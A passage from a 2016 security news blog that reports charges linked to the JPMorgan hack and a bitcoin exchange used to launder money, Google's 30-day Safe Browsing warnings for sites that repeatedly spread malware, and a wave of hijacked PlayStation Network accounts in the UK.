A third individual, Joshua Aaron from Florida, is also wanted in connection with these charges. Aaron is believed to have fled to Russia, which he frequently visited. This has led to some suggestions that the actual hacker (rather than the orchestrators) of the JPMorgan hack and others may be Russian. Last month Bloomberg reported that Aaron had been located in Russia, but is no longer welcome there. "The only American suspect named in the largest known hack of Wall Street is negotiating his return to the U.S. from a detention cell in Russia, where he's no longer welcome."

The investigation into the JPMorgan breach led to Sharon, and Sharon led to seems to have been used as a laundering facility for other criminal activities, including the proceeds of ransomware. It is possible that the personal details stolen from the JPMorgan and other hacks helped facilitate some of this illegal activity. was operated by Anthony Murgio, also from Florida. He and four others associated with the bitcoin exchange were arrested around the same time as Shalon. At that time the FBI stated: "Murgio and his co-conspirators knowingly enabled the criminals responsible for those attacks to receive the proceeds of their crimes, yet, in violation of federal anti-money laundering laws, Murgio never filed any suspicious activity reports regarding any of the transactions."

The latest charge against Hill claims that he was employed as a finance support manager and business development consultant for an unlicensed bitcoin exchange, that is, The complaint against Hill claims that he and others profited from numerous bitcoin transactions conducted on behalf of victims of schemes involving ransomware. 

Wednesday, 9 November 2016

Google to Label Malware Sites with 30-Day Full Page Alerts

Google will slap repeat malware offenders with a 30-day red alert for website visitors.
Chrome, Firefox and Safari will display a full page 'deceptive' warning for those websites that appear to intentionally spread malware, unwanted software or phishing pages.
Further, they’ll be blocked from the Safe Browsing review process, to prevent nefarious webmasters from gaming the system.
Google normally allows a review process if a site is branded as harmful. An operator can ask Google to review the site and remove the warning once it has been confirmed that the offending issue has been rectified.
However, Google has observed that some websites will cease harming users for long enough to have the warnings removed, and will then revert to harmful activity.
“Repeat Offenders are websites that repeatedly switch between compliant and policy-violating behavior for the purpose of having a successful review and having warnings removed,” said Brooke Heinichen, of the Google Safe Browsing Team. “Once Safe Browsing has determined that a site is a Repeat Offender, the webmaster will be unable to request additional reviews via the Search Console for 30 days, and warnings will continue to show to users. When a site is established as a Repeat Offender, the webmaster will be notified via email to their registered Search Console email address.”
Websites that are hacked will not be classified as Repeat Offenders; only sites that purposefully post harmful content will be subject to the policy.

Rash of PlayStation Hacks Hits UK Gamers

Widespread reports of stolen PlayStation Network accounts, especially in the UK, have started appearing in support forums.
PlayStation gamers have taken in droves in the past few weeks to the Sony Twitter support handle as well as Reddit to report that they have had their accounts hacked. In some cases, users say that the compromises resulted in fraudulent charges being made—mostly, they complain of their account IDs being changed so they can’t log in.
Sony has yet to issue an official response, but it’s been replying to customer tweets directing users to a generic contact form.
The compromises could be stemming from phishing attacks, or credential re-use (i.e., a hack of another site yielded credentials that also work for PSN). The issue could also be botnet-driven.
The other possibility is a hack of the platform itself, which is not unprecedented. The 2011 PlayStation hack exposed the personal information of the entire PSN user base, 77 million people, including users' account names, dates of birth, email addresses and credit card details. The incident, which Anonymous took credit for, forced the company to shut down its entire system for almost a month.
In April, five years after the massive hack, Sony finally implemented two-factor authentication for the PSN. Encouragingly, 2FA has alerted some users to an account compromise. One person said on Reddit: “I've had my psn account hacked twice. Both times I managed to regain control of it. Then Sony released two factor sign in. Since Saturday I've gotten I think eight requests for the code. Someone is trying again and has somehow gotten my password.”